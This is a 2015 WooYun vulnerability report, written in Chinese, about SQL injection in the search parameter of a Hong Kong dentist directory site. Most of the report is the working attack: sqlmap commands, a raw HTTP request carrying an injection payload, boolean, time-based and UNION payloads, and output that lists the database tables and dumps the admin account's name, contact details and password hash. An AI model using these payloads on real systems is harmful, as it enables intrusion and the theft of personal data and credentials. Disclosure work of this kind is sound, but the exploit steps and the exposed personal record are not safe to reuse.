当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161700

漏洞标题:香港牙醫網存在SQL注入漏洞(香港地區)

相关厂商:香港牙醫網

漏洞作者: 路人甲

提交时间:2015-12-16 11:45

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-28: 细节向核心白帽子及相关领域专家公开
2016-01-07: 细节向普通白帽子公开
2016-01-17: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

香港牙醫網存在SQL注入漏洞

详细说明:

測試地址:http://**.**.**.**/index.php?actiontype=search&language=eng&dentist_name=hui&clinic_dist=2

sqlmap -r 3.txt -p clinic_dist


3.txt:
GET /index.php?actiontype=search&language=eng&dentist_name=hui&clinic_dist=222%27%20or%20(select%201)%20and%20%271%27=%271 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=34d7102b2a211b4e59ccc39880963bcf
Connection: keep-alive


sqlmap -r 3.txt -p clinic_dist -D hkdentis_aosDBdentist -T hkdentists_users --dump

漏洞证明:

---
Parameter: clinic_dist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' AND 4779=4779 AND 'UBUb'='UBUb
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' AND (SELECT * FROM (SELECT(SLEEP(5)))emwE) AND 'Ibdz'='Ibdz
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a707671,0x586f68664d4d4c597870,0x7170706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web application technology: Apache
back-end DBMS: MySQL 5.0.12
current user:    'aosDBdentist@localhost'
current database:    'hkdentis_aosDBdentist'
hostname:    '**.**.**.**'
current user is DBA:    False
database management system users [1]:
[*] 'aosDBdentist'@'localhost'
back-end DBMS: MySQL 5.0.12
Database: hkdentis_aosDBdentist
[12 tables]
+--------------------------+
| aos_directory_dchk       |
| aos_hk_area              |
| hkdentists_advertisement |
| hkdentists_clinic        |
| hkdentists_dentist_quali |
| hkdentists_dentists      |
| hkdentists_district      |
| hkdentists_documents     |
| hkdentists_licenses      |
| hkdentists_qualification |
| hkdentists_searchlog     |
| hkdentists_users         |
+--------------------------+
web application technology: Apache
back-end DBMS: MySQL 5.0.12
Database: hkdentis_aosDBdentist
Table: hkdentists_users
[17 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| address1   | varchar(100) |
| address2   | varchar(100) |
| city       | varchar(50)  |
| email      | varchar(50)  |
| fax        | varchar(30)  |
| firstname  | varchar(50)  |
| id         | int(11)      |
| jobtitle   | varchar(50)  |
| last_login | int(11)      |
| lastname   | varchar(50)  |
| login_name | varchar(50)  |
| mobile     | varchar(30)  |
| password   | varchar(50)  |
| phone      | varchar(30)  |
| role       | tinyint(1)   |
| status     | tinyint(4)   |
| title      | varchar(10)  |
+------------+--------------+
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: clinic_dist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' AND 4779=4779 AND 'UBUb'='UBUb
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' AND (SELECT * FROM (SELECT(SLEEP(5)))emwE) AND 'Ibdz'='Ibdz
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a707671,0x586f68664d4d4c597870,0x7170706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web application technology: Apache
back-end DBMS: MySQL 5.0.12
Database: hkdentis_aosDBdentist
Table: hkdentists_users
[1 entry]
+----+----------+-----------+------+-------+---------+---------------------+--------+---------+----------+----------+----------+------------+----------------------------------+-----------+------------+------------+
| id | fax      | city      | role | title | phone   | email               | status | mobile  | address1 | address2 | lastname | jobtitle   | password                         | firstname | login_name | last_login |
+----+----------+-----------+------+-------+---------+---------------------+--------+---------+----------+----------+----------+------------+----------------------------------+-----------+------------+------------+
| 1  | 30072787 | Hong Kong | 1    | Mr.   | <blank> | chester@**.**.**.** | 1      | <blank> | <blank>  | <blank>  | Cheng    | Programmer | f4d0fcce6d1c8bf3bd19ac39da0bfed6 | Chester   | admin      | 1449221493 |
+----+----------+-----------+------+-------+---------+---------------------+--------+---------+----------+----------+----------+------------+----------------------------------+-----------+------------+------------+

修复方案:

增加過濾

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-18 18:19

厂商回复:

已將事件通知有關機構

最新状态:

暂无